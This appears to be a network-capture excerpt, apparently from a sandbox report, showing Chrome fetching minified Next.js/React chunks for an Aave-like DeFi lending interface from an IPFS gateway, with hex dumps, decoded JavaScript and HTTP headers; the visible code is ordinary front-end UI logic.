                                                                                                                                                                                                                                                  2024-09-28 04:11:42 UTC1304INData Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 4e 5f 45 3d 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 4e 5f 45 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 39 31 38 39 5d 2c 7b 36 32 37 35 33 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 6e 2c 74 29 7b 76 61 72 20 72 3d 74 28 36 34 38 33 36 29 3b 6e 2e 5a 3d 76 6f 69 64 20 30 3b 76 61 72 20 6f 3d 72 28 74 28 36 34 39 33 38 29 29 2c 69 3d 74 28 38 35 38 39 33 29 2c 73 3d 28 30 2c 6f 2e 64 65 66 61 75 6c 74 29 28 28 30 2c 69 2e 6a 73 78 29 28 22 70 61 74 68 22 2c 7b 64 3a 22 6d 31 39 2e 37 37 20 37 2e 32 33 2e 30 31 2d 2e 30 31 2d 33 2e 37 32 2d 33 2e 37 32 4c 31 35 20 34 2e 35 36 6c 32 2e 31 31 20 32 2e 31 31 63 2d 2e 39 34 2e 33 36 2d 31 2e 36 31 20 31 2e 32 36
                                                                                                                                                                                                                                                  Data Ascii: "use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[9189],{62753:function(e,n,t){var r=t(64836);n.Z=void 0;var o=r(t(64938)),i=t(85893),s=(0,o.default)((0,i.jsx)("path",{d:"m19.77 7.23.01-.01-3.72-3.72L15 4.56l2.11 2.11c-.94.36-1.61 1.26
                                                                                                                                                                                                                                                  2024-09-28 04:11:42 UTC1369INData Raw: 6d 22 2c 6f 76 65 72 66 6c 6f 77 3a 22 68 69 64 64 65 6e 22 2c 64 69 73 70 6c 61 79 3a 22 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 22 2c 74 65 78 74 41 6c 69 67 6e 3a 22 63 65 6e 74 65 72 22 2c 66 6c 65 78 53 68 72 69 6e 6b 3a 30 2c 66 6f 6e 74 53 69 7a 65 3a 7b 69 6e 68 65 72 69 74 3a 22 69 6e 68 65 72 69 74 22 2c 73 6d 61 6c 6c 3a 65 2e 74 79 70 6f 67 72 61 70 68 79 2e 70 78 54 6f 52 65 6d 28 32 30 29 2c 6d 65 64 69 75 6d 3a 65 2e 74 79 70 6f 67 72 61 70 68 79 2e 70 78 54 6f 52 65 6d 28 32 34 29 2c 6c 61 72 67 65 3a 65 2e 74 79 70 6f 67 72 61 70 68 79 2e 70 78 54 6f 52 65 6d 28 33 36 29 7d 5b 6e 2e 66 6f 6e 74 53 69 7a 65 5d 2c 63 6f 6c 6f 72 3a 7b 70 72 69 6d 61 72 79 3a 28 65 2e 76 61 72 73 7c 7c 65 29 2e 70 61 6c 65 74 74 65 2e 70 72 69 6d 61 72 79 2e 6d
                                                                                                                                                                                                                                                  Data Ascii: m",overflow:"hidden",display:"inline-block",textAlign:"center",flexShrink:0,fontSize:{inherit:"inherit",small:e.typography.pxToRem(20),medium:e.typography.pxToRem(24),large:e.typography.pxToRem(36)}[n.fontSize],color:{primary:(e.vars||e).palette.primary.m
                                                                                                                                                                                                                                                  2024-09-28 04:11:42 UTC1369INData Raw: 41 72 72 61 79 28 65 29 2e 66 69 6c 74 65 72 28 42 6f 6f 6c 65 61 6e 29 3b 72 65 74 75 72 6e 20 74 2e 72 65 64 75 63 65 28 28 28 65 2c 72 2c 6f 29 3d 3e 28 65 2e 70 75 73 68 28 72 29 2c 6f 3c 74 2e 6c 65 6e 67 74 68 2d 31 26 26 65 2e 70 75 73 68 28 69 2e 63 6c 6f 6e 65 45 6c 65 6d 65 6e 74 28 6e 2c 7b 6b 65 79 3a 60 73 65 70 61 72 61 74 6f 72 2d 24 7b 6f 7d 60 7d 29 29 2c 65 29 29 2c 5b 5d 29 7d 63 6f 6e 73 74 20 68 3d 28 30 2c 64 2e 5a 50 29 28 22 64 69 76 22 2c 7b 6e 61 6d 65 3a 22 4d 75 69 53 74 61 63 6b 22 2c 73 6c 6f 74 3a 22 52 6f 6f 74 22 2c 6f 76 65 72 72 69 64 65 73 52 65 73 6f 6c 76 65 72 3a 28 65 2c 6e 29 3d 3e 5b 6e 2e 72 6f 6f 74 5d 7d 29 28 28 28 7b 6f 77 6e 65 72 53 74 61 74 65 3a 65 2c 74 68 65 6d 65 3a 6e 7d 29 3d 3e 7b 6c 65 74 20 74 3d
                                                                                                                                                                                                                                                  Data Ascii: Array(e).filter(Boolean);return t.reduce(((e,r,o)=>(e.push(r),o<t.length-1&&e.push(i.cloneElement(n,{key:`separator-${o}`})),e)),[])}const h=(0,d.ZP)("div",{name:"MuiStack",slot:"Root",overridesResolver:(e,n)=>[n.root]})((({ownerState:e,theme:n})=>{let t=
                                                                                                                                                                                                                                                  2024-09-28 04:11:42 UTC1369INData Raw: 3d 76 7d 2c 31 32 33 34 39 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 6e 2c 74 29 7b 74 2e 64 28 6e 2c 7b 4d 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 62 7d 7d 29 3b 76 61 72 20 72 3d 74 28 31 32 37 39 29 2c 6f 3d 74 28 38 30 30 35 39 29 2c 69 3d 74 28 33 30 31 32 30 29 2c 73 3d 74 28 32 39 36 33 30 29 2c 61 3d 74 28 38 31 36 34 35 29 2c 63 3d 74 28 36 37 32 39 34 29 2c 6c 3d 74 28 37 38 33 37 31 29 2c 64 3d 74 28 35 37 36 30 39 29 2c 75 3d 74 28 39 37 35 36 33 29 2c 70 3d 74 28 34 31 30 32 34 29 2c 66 3d 74 28 37 32 36 36 37 29 2c 6d 3d 74 28 34 39 35 30 31 29 2c 68 3d 74 28 39 32 33 39 31 29 2c 76 3d 74 28 38 35 38 39 33 29 2c 78 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 6e 3d 65 2e 69 6e 63 65 6e 74 69 76 65 73 2c 74 3d 65 2e 69 6e 63
                                                                                                                                                                                                                                                  Data Ascii: =v},12349:function(e,n,t){t.d(n,{M:function(){return b}});var r=t(1279),o=t(80059),i=t(30120),s=t(29630),a=t(81645),c=t(67294),l=t(78371),d=t(57609),u=t(97563),p=t(41024),f=t(72667),m=t(49501),h=t(92391),v=t(85893),x=function(e){var n=e.incentives,t=e.inc
                                                                                                                                                                                                                                                  2024-09-28 04:11:42 UTC1369INData Raw: 72 65 6e 3a 28 30 2c 76 2e 6a 73 78 29 28 61 2c 7b 69 6e 63 65 6e 74 69 76 65 41 50 52 3a 65 2e 69 6e 63 65 6e 74 69 76 65 41 50 52 7d 29 7d 2c 65 2e 72 65 77 61 72 64 54 6f 6b 65 6e 41 64 64 72 65 73 73 29 7d 29 29 2c 6e 2e 6c 65 6e 67 74 68 3e 31 26 26 28 30 2c 76 2e 6a 73 78 29 28 69 2e 5a 2c 7b 73 78 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 7b 70 74 3a 31 2c 6d 74 3a 31 2c 62 6f 72 64 65 72 3a 22 31 70 78 20 73 6f 6c 69 64 20 22 2e 63 6f 6e 63 61 74 28 65 2e 70 61 6c 65 74 74 65 2e 64 69 76 69 64 65 72 29 7d 7d 2c 63 68 69 6c 64 72 65 6e 3a 28 30 2c 76 2e 6a 73 78 29 28 68 2e 58 2c 7b 63 61 70 74 69 6f 6e 3a 28 30 2c 76 2e 6a 73 78 29 28 6d 2e 63 43 2c 7b 69 64 3a 22 4e 65 74 20 41 50 52 22 7d 29 2c 68 65 69 67 68 74 3a 33 32 2c 63 68
                                                                                                                                                                                                                                                  Data Ascii: ren:(0,v.jsx)(a,{incentiveAPR:e.incentiveAPR})},e.rewardTokenAddress)})),n.length>1&&(0,v.jsx)(i.Z,{sx:function(e){return{pt:1,mt:1,border:"1px solid ".concat(e.palette.divider)}},children:(0,v.jsx)(h.X,{caption:(0,v.jsx)(m.cC,{id:"Net APR"}),height:32,ch
                                                                                                                                                                                                                                                  2024-09-28 04:11:42 UTC1369INData Raw: 68 6f 76 65 72 22 3a 22 74 72 61 6e 73 70 61 72 65 6e 74 22 2c 22 26 3a 68 6f 76 65 72 22 3a 7b 62 67 63 6f 6c 6f 72 3a 22 61 63 74 69 6f 6e 2e 68 6f 76 65 72 22 2c 62 6f 72 64 65 72 43 6f 6c 6f 72 3a 22 61 63 74 69 6f 6e 2e 64 69 73 61 62 6c 65 64 22 7d 7d 7d 2c 6f 6e 43 6c 69 63 6b 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 67 28 64 2e 68 31 2e 56 49 45 57 5f 4c 4d 5f 44 45 54 41 49 4c 53 5f 44 41 53 48 42 4f 41 52 44 2c 7b 7d 29 2c 6a 28 21 62 29 7d 2c 63 68 69 6c 64 72 65 6e 3a 5b 28 30 2c 76 2e 6a 73 78 29 28 69 2e 5a 2c 7b 73 78 3a 7b 6d 72 3a 32 7d 2c 63 68 69 6c 64 72 65 6e 3a 22 49 6e 66 69 6e 69 74 79 22 21 3d 3d 4f 26 26 4f 3c 31 65 34 3f 28 30 2c 76 2e 6a 73 78 29 28 70 2e 42 2c 7b 76 61 6c 75 65 3a 4f 2c 70 65 72 63 65 6e 74 3a 21 30 2c 76 61 72 69
                                                                                                                                                                                                                                                  Data Ascii: hover":"transparent","&:hover":{bgcolor:"action.hover",borderColor:"action.disabled"}}},onClick:function(){g(d.h1.VIEW_LM_DETAILS_DASHBOARD,{}),j(!b)},children:[(0,v.jsx)(i.Z,{sx:{mr:2},children:"Infinity"!==O&&O<1e4?(0,v.jsx)(p.B,{value:O,percent:!0,vari
                                                                                                                                                                                                                                                  2024-09-28 04:11:42 UTC1369INData Raw: 69 66 28 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 53 79 6d 62 6f 6c 73 29 7b 76 61 72 20 72 3d 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 53 79 6d 62 6f 6c 73 28 65 29 3b 6e 26 26 28 72 3d 72 2e 66 69 6c 74 65 72 28 28 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 72 65 74 75 72 6e 20 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 44 65 73 63 72 69 70 74 6f 72 28 65 2c 6e 29 2e 65 6e 75 6d 65 72 61 62 6c 65 7d 29 29 29 2c 74 2e 70 75 73 68 2e 61 70 70 6c 79 28 74 2c 72 29 7d 72 65 74 75 72 6e 20 74 7d 66 75 6e 63 74 69 6f 6e 20 6d 28 65 29 7b 66 6f 72 28 76 61 72 20 6e 3d 31 3b 6e 3c 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3b 6e 2b 2b 29 7b 76 61 72 20 74 3d 6e 75 6c 6c 21 3d 61 72 67 75 6d 65 6e 74
                                                                                                                                                                                                                                                  Data Ascii: if(Object.getOwnPropertySymbols){var r=Object.getOwnPropertySymbols(e);n&&(r=r.filter((function(n){return Object.getOwnPropertyDescriptor(e,n).enumerable}))),t.push.apply(t,r)}return t}function m(e){for(var n=1;n<arguments.length;n++){var t=null!=argument
                                                                                                                                                                                                                                                  2024-09-28 04:11:42 UTC1369INData Raw: 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 28 30 2c 70 2e 6a 73 78 29 28 75 2e 61 2c 7b 74 6f 6f 6c 74 69 70 43 6f 6e 74 65 6e 74 3a 28 30 2c 70 2e 6a 73 78 29 28 6a 2c 7b 63 6f 6e 74 65 6e 74 3a 28 30 2c 70 2e 6a 73 78 29 28 6f 2e 63 43 2c 7b 69 64 3a 22 41 73 73 65 74 20 63 61 6e 20 62 65 20 6f 6e 6c 79 20 75 73 65 64 20 61 73 20 63 6f 6c 6c 61 74 65 72 61 6c 20 69 6e 20 69 73 6f 6c 61 74 69 6f 6e 20 6d 6f 64 65 20 77 69 74 68 20 6c 69 6d 69 74 65 64 20 62 6f 72 72 6f 77 69 6e 67 20 70 6f 77 65 72 2e 20 54 6f 20 65 6e 74 65 72 20 69 73 6f 6c 61 74 69 6f 6e 20 6d 6f 64 65 2c 20 64 69 73 61 62 6c 65 20 61 6c 6c 20 6f 74 68 65 72 20 63 6f 6c 6c 61 74 65 72 61 6c 2e 22 7d 29 7d 29 2c 63 68 69 6c 64 72 65 6e 3a 28 30 2c 70 2e 6a 73 78 73 29 28 63
                                                                                                                                                                                                                                                  Data Ascii: =function(){return(0,p.jsx)(u.a,{tooltipContent:(0,p.jsx)(j,{content:(0,p.jsx)(o.cC,{id:"Asset can be only used as collateral in isolation mode with limited borrowing power. To enter isolation mode, disable all other collateral."})}),children:(0,p.jsxs)(c
                                                                                                                                                                                                                                                  2024-09-28 04:11:42 UTC1369INData Raw: 7b 72 65 74 75 72 6e 20 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 44 65 73 63 72 69 70 74 6f 72 28 65 2c 6e 29 2e 65 6e 75 6d 65 72 61 62 6c 65 7d 29 29 29 2c 74 2e 70 75 73 68 2e 61 70 70 6c 79 28 74 2c 72 29 7d 72 65 74 75 72 6e 20 74 7d 66 75 6e 63 74 69 6f 6e 20 64 28 65 29 7b 66 6f 72 28 76 61 72 20 6e 3d 31 3b 6e 3c 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3b 6e 2b 2b 29 7b 76 61 72 20 74 3d 6e 75 6c 6c 21 3d 61 72 67 75 6d 65 6e 74 73 5b 6e 5d 3f 61 72 67 75 6d 65 6e 74 73 5b 6e 5d 3a 7b 7d 3b 6e 25 32 3f 6c 28 4f 62 6a 65 63 74 28 74 29 2c 21 30 29 2e 66 6f 72 45 61 63 68 28 28 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 28 30 2c 72 2e 5a 29 28 65 2c 6e 2c 74 5b 6e 5d 29 7d 29 29 3a 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72
                                                                                                                                                                                                                                                  Data Ascii: {return Object.getOwnPropertyDescriptor(e,n).enumerable}))),t.push.apply(t,r)}return t}function d(e){for(var n=1;n<arguments.length;n++){var t=null!=arguments[n]?arguments[n]:{};n%2?l(Object(t),!0).forEach((function(n){(0,r.Z)(e,n,t[n])})):Object.getOwnPr


                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                  26192.168.2.549741209.94.90.34431076C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                  2024-09-28 04:11:42 UTC503OUTGET /_next/static/chunks/797.224fdb0a57599ef0.js HTTP/1.1
                                                                                                                                                                                                                                                  Host: bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.link
                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                                                                  Sec-Fetch-Site: none
                                                                                                                                                                                                                                                  Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                  Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                  Cookie: __cflb=02DiuHFpDhc3YAVzwBqGVx23Wx7BLmnbsd1SxZG9bHeR2
                                                                                                                                                                                                                                                  2024-09-28 04:11:42 UTC1359INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                  Date: Sat, 28 Sep 2024 04:11:42 GMT
                                                                                                                                                                                                                                                  Content-Type: text/javascript; charset=utf-8
                                                                                                                                                                                                                                                  Content-Length: 46641
                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                  access-control-allow-headers: Content-Type
                                                                                                                                                                                                                                                  access-control-allow-headers: Range
                                                                                                                                                                                                                                                  access-control-allow-headers: User-Agent
                                                                                                                                                                                                                                                  access-control-allow-headers: X-Requested-With
                                                                                                                                                                                                                                                  access-control-allow-methods: GET
                                                                                                                                                                                                                                                  access-control-allow-methods: HEAD
                                                                                                                                                                                                                                                  access-control-allow-methods: OPTIONS
                                                                                                                                                                                                                                                  access-control-allow-origin: *
                                                                                                                                                                                                                                                  access-control-expose-headers: Content-Length
                                                                                                                                                                                                                                                  access-control-expose-headers: Content-Range
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Chunked-Output
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Ipfs-Path
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Ipfs-Roots
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Stream-Output
                                                                                                                                                                                                                                                  Cache-Control: public, max-age=29030400, immutable
                                                                                                                                                                                                                                                  etag: "bafkreigib2gvyuhhedfdj3b3c4aznwbgtbywjkoiqflgq57d3wqam4yy7m"
                                                                                                                                                                                                                                                  x-ipfs-path: /ipfs/bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy/_next/static/chunks/797.224fdb0a57599ef0.js
                                                                                                                                                                                                                                                  x-ipfs-roots: bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy,bafybeibkk2t3wa2shw62jhntzsugx2oh7gf6zlbu3gb6gdxmeuwt6wi6se,bafybeihww4l5iuauf4leipzwanhudgpdxwdltpxcn6hqqud65jpcaq33xe,bafybeigaj3cwdjktvw36akiq43niv2siihkxaslemvv33lw5mhruragm5a,bafkreigib2gvyuhhedfdj3b3c4aznwbgtbywjkoiqflgq57d3wqam4yy7m
                                                                                                                                                                                                                                                  x-ipfs-pop: rainbow-ny5-04
                                                                                                                                                                                                                                                  CF-Cache-Status: HIT
                                                                                                                                                                                                                                                  Age: 13028476
                                                                                                                                                                                                                                                  2024-09-28 04:11:42 UTC74INData Raw: 41 63 63 65 70 74 2d 52 61 6e 67 65 73 3a 20 62 79 74 65 73 0d 0a 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 63 61 30 65 34 31 34 35 38 65 37 38 63 63 36 2d 45 57 52 0d 0a 0d 0a
                                                                                                                                                                                                                                                  Data Ascii: Accept-Ranges: bytesServer: cloudflareCF-RAY: 8ca0e41458e78cc6-EWR
                                                                                                                                                                                                                                                  2024-09-28 04:11:42 UTC1369INData Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 4e 5f 45 3d 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 4e 5f 45 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 37 39 37 5d 2c 7b 36 32 37 35 33 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 72 29 7b 76 61 72 20 6e 3d 72 28 36 34 38 33 36 29 3b 74 2e 5a 3d 76 6f 69 64 20 30 3b 76 61 72 20 6f 3d 6e 28 72 28 36 34 39 33 38 29 29 2c 61 3d 72 28 38 35 38 39 33 29 2c 73 3d 28 30 2c 6f 2e 64 65 66 61 75 6c 74 29 28 28 30 2c 61 2e 6a 73 78 29 28 22 70 61 74 68 22 2c 7b 64 3a 22 6d 31 39 2e 37 37 20 37 2e 32 33 2e 30 31 2d 2e 30 31 2d 33 2e 37 32 2d 33 2e 37 32 4c 31 35 20 34 2e 35 36 6c 32 2e 31 31 20 32 2e 31 31 63 2d 2e 39 34 2e 33 36 2d 31 2e 36 31 20 31 2e 32 36 2d
                                                                                                                                                                                                                                                  Data Ascii: "use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[797],{62753:function(e,t,r){var n=r(64836);t.Z=void 0;var o=n(r(64938)),a=r(85893),s=(0,o.default)((0,a.jsx)("path",{d:"m19.77 7.23.01-.01-3.72-3.72L15 4.56l2.11 2.11c-.94.36-1.61 1.26-
                                                                                                                                                                                                                                                  2024-09-28 04:11:42 UTC1369INData Raw: 78 53 68 72 69 6e 6b 3a 30 2c 66 6f 6e 74 53 69 7a 65 3a 7b 69 6e 68 65 72 69 74 3a 22 69 6e 68 65 72 69 74 22 2c 73 6d 61 6c 6c 3a 65 2e 74 79 70 6f 67 72 61 70 68 79 2e 70 78 54 6f 52 65 6d 28 32 30 29 2c 6d 65 64 69 75 6d 3a 65 2e 74 79 70 6f 67 72 61 70 68 79 2e 70 78 54 6f 52 65 6d 28 32 34 29 2c 6c 61 72 67 65 3a 65 2e 74 79 70 6f 67 72 61 70 68 79 2e 70 78 54 6f 52 65 6d 28 33 36 29 7d 5b 74 2e 66 6f 6e 74 53 69 7a 65 5d 2c 63 6f 6c 6f 72 3a 7b 70 72 69 6d 61 72 79 3a 28 65 2e 76 61 72 73 7c 7c 65 29 2e 70 61 6c 65 74 74 65 2e 70 72 69 6d 61 72 79 2e 6d 61 69 6e 2c 73 65 63 6f 6e 64 61 72 79 3a 28 65 2e 76 61 72 73 7c 7c 65 29 2e 70 61 6c 65 74 74 65 2e 73 65 63 6f 6e 64 61 72 79 2e 6d 61 69 6e 2c 69 6e 66 6f 3a 28 65 2e 76 61 72 73 7c 7c 65 29 2e
                                                                                                                                                                                                                                                  Data Ascii: xShrink:0,fontSize:{inherit:"inherit",small:e.typography.pxToRem(20),medium:e.typography.pxToRem(24),large:e.typography.pxToRem(36)}[t.fontSize],color:{primary:(e.vars||e).palette.primary.main,secondary:(e.vars||e).palette.secondary.main,info:(e.vars||e).
                                                                                                                                                                                                                                                  2024-09-28 04:11:42 UTC1369INData Raw: 6c 65 6e 67 74 68 2d 31 26 26 65 2e 70 75 73 68 28 61 2e 63 6c 6f 6e 65 45 6c 65 6d 65 6e 74 28 74 2c 7b 6b 65 79 3a 60 73 65 70 61 72 61 74 6f 72 2d 24 7b 6f 7d 60 7d 29 29 2c 65 29 29 2c 5b 5d 29 7d 63 6f 6e 73 74 20 79 3d 28 30 2c 75 2e 5a 50 29 28 22 64 69 76 22 2c 7b 6e 61 6d 65 3a 22 4d 75 69 53 74 61 63 6b 22 2c 73 6c 6f 74 3a 22 52 6f 6f 74 22 2c 6f 76 65 72 72 69 64 65 73 52 65 73 6f 6c 76 65 72 3a 28 65 2c 74 29 3d 3e 5b 74 2e 72 6f 6f 74 5d 7d 29 28 28 28 7b 6f 77 6e 65 72 53 74 61 74 65 3a 65 2c 74 68 65 6d 65 3a 74 7d 29 3d 3e 7b 6c 65 74 20 72 3d 28 30 2c 6f 2e 5a 29 28 7b 64 69 73 70 6c 61 79 3a 22 66 6c 65 78 22 2c 66 6c 65 78 44 69 72 65 63 74 69 6f 6e 3a 22 63 6f 6c 75 6d 6e 22 7d 2c 28 30 2c 73 2e 6b 39 29 28 7b 74 68 65 6d 65 3a 74 7d
                                                                                                                                                                                                                                                  Data Ascii: length-1&&e.push(a.cloneElement(t,{key:`separator-${o}`})),e)),[])}const y=(0,u.ZP)("div",{name:"MuiStack",slot:"Root",overridesResolver:(e,t)=>[t.root]})((({ownerState:e,theme:t})=>{let r=(0,o.Z)({display:"flex",flexDirection:"column"},(0,s.k9)({theme:t}
                                                                                                                                                                                                                                                  2024-09-28 04:11:42 UTC1369INData Raw: 34 39 35 30 31 29 2c 6f 3d 72 28 36 38 38 36 31 29 2c 61 3d 72 28 38 35 38 39 33 29 2c 73 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 28 30 2c 61 2e 6a 73 78 29 28 6e 2e 63 43 2c 7b 69 64 3a 22 3c 30 3e 41 6d 70 6c 65 66 6f 72 74 68 3c 2f 30 3e 20 69 73 20 61 20 72 65 62 61 73 69 6e 67 20 61 73 73 65 74 2e 20 56 69 73 69 74 20 74 68 65 20 3c 31 3e 64 6f 63 75 6d 65 6e 74 61 74 69 6f 6e 3c 2f 31 3e 20 74 6f 20 6c 65 61 72 6e 20 6d 6f 72 65 2e 22 2c 63 6f 6d 70 6f 6e 65 6e 74 73 3a 7b 30 3a 28 30 2c 61 2e 6a 73 78 29 28 22 62 22 2c 7b 7d 29 2c 31 3a 28 30 2c 61 2e 6a 73 78 29 28 6f 2e 72 55 2c 7b 68 72 65 66 3a 22 68 74 74 70 73 3a 2f 2f 64 6f 63 73 2e 61 61 76 65 2e 63 6f 6d 2f 64 65 76 65 6c 6f 70 65 72 73 2f 76 2f 32 2e 30 2f 67 75 69 64 65 73
                                                                                                                                                                                                                                                  Data Ascii: 49501),o=r(68861),a=r(85893),s=function(){return(0,a.jsx)(n.cC,{id:"<0>Ampleforth</0> is a rebasing asset. Visit the <1>documentation</1> to learn more.",components:{0:(0,a.jsx)("b",{}),1:(0,a.jsx)(o.rU,{href:"https://docs.aave.com/developers/v/2.0/guides
                                                                                                                                                                                                                                                  2024-09-28 04:11:42 UTC1369INData Raw: 65 20 73 75 70 70 6c 79 20 63 61 70 20 69 73 20 72 65 61 63 68 65 64 2e 22 7d 29 3a 28 30 2c 6c 2e 6a 73 78 29 28 61 2e 63 43 2c 7b 69 64 3a 22 54 68 69 73 20 69 73 20 74 68 65 20 74 6f 74 61 6c 20 61 6d 6f 75 6e 74 20 61 76 61 69 6c 61 62 6c 65 20 66 6f 72 20 79 6f 75 20 74 6f 20 62 6f 72 72 6f 77 2e 20 59 6f 75 20 63 61 6e 20 62 6f 72 72 6f 77 20 62 61 73 65 64 20 6f 6e 20 79 6f 75 72 20 63 6f 6c 6c 61 74 65 72 61 6c 20 61 6e 64 20 75 6e 74 69 6c 20 74 68 65 20 62 6f 72 72 6f 77 20 63 61 70 20 69 73 20 72 65 61 63 68 65 64 2e 22 7d 29 3b 72 65 74 75 72 6e 28 30 2c 6c 2e 6a 73 78 29 28 69 2e 47 2c 64 28 64 28 7b 7d 2c 72 29 2c 7b 7d 2c 7b 63 68 69 6c 64 72 65 6e 3a 6e 7d 29 29 7d 7d 2c 38 36 30 39 39 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 72 29 7b 72
                                                                                                                                                                                                                                                  Data Ascii: e supply cap is reached."}):(0,l.jsx)(a.cC,{id:"This is the total amount available for you to borrow. You can borrow based on your collateral and until the borrow cap is reached."});return(0,l.jsx)(i.G,d(d({},r),{},{children:n}))}},86099:function(e,t,r){r
                                                                                                                                                                                                                                                  2024-09-28 04:11:42 UTC1369INData Raw: 44 65 63 69 6d 61 6c 73 3a 34 2c 76 61 72 69 61 6e 74 3a 22 73 65 63 6f 6e 64 61 72 79 31 32 22 2c 63 6f 6c 6f 72 3a 22 74 65 78 74 2e 70 72 69 6d 61 72 79 22 7d 29 2c 28 30 2c 70 2e 6a 73 78 29 28 73 2e 5a 2c 7b 76 61 72 69 61 6e 74 3a 22 74 6f 6f 6c 74 69 70 22 2c 63 68 69 6c 64 72 65 6e 3a 66 7d 29 5d 7d 29 5d 7d 29 5d 7d 29 7d 7d 2c 35 33 36 30 31 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 72 29 7b 72 2e 64 28 74 2c 7b 6c 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 54 7d 2c 57 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 45 7d 7d 29 3b 76 61 72 20 6e 3d 72 28 35 39 34 39 39 29 2c 6f 3d 72 28 34 37 33 30 29 2c 61 3d 72 28 34 39 35 30 31 29 2c 73 3d 72 28 33 33 37 34 30 29 2c 69 3d 72 28 36 32 30 39 37 29 2c 6c 3d 72 28 33 30 31
                                                                                                                                                                                                                                                  Data Ascii: Decimals:4,variant:"secondary12",color:"text.primary"}),(0,p.jsx)(s.Z,{variant:"tooltip",children:f})]})]})]})}},53601:function(e,t,r){r.d(t,{l:function(){return T},W:function(){return E}});var n=r(59499),o=r(4730),a=r(49501),s=r(33740),i=r(62097),l=r(301
                                                                                                                                                                                                                                                  2024-09-28 04:11:42 UTC1369INData Raw: 73 61 62 6c 65 64 2c 67 3d 65 2e 64 69 73 61 62 6c 65 49 6e 70 75 74 2c 4f 3d 65 2e 6f 6e 53 65 6c 65 63 74 2c 43 3d 65 2e 61 73 73 65 74 73 2c 45 3d 65 2e 63 61 70 54 79 70 65 2c 49 3d 65 2e 6d 61 78 56 61 6c 75 65 2c 50 3d 65 2e 69 73 4d 61 78 53 65 6c 65 63 74 65 64 2c 4c 3d 65 2e 69 6e 70 75 74 54 69 74 6c 65 2c 52 3d 65 2e 62 61 6c 61 6e 63 65 54 65 78 74 2c 5a 3d 65 2e 6c 6f 61 64 69 6e 67 2c 44 3d 76 6f 69 64 20 30 21 3d 3d 5a 26 26 5a 2c 42 3d 65 2e 65 76 65 6e 74 2c 4d 3d 65 2e 73 65 6c 65 63 74 4f 70 74 69 6f 6e 48 65 61 64 65 72 2c 4e 3d 65 2e 73 65 6c 65 63 74 4f 70 74 69 6f 6e 2c 57 3d 65 2e 73 78 2c 5f 3d 76 6f 69 64 20 30 3d 3d 3d 57 3f 7b 7d 3a 57 2c 55 3d 65 2e 65 78 63 68 61 6e 67 65 52 61 74 65 43 6f 6d 70 6f 6e 65 6e 74 2c 71 3d 28 30
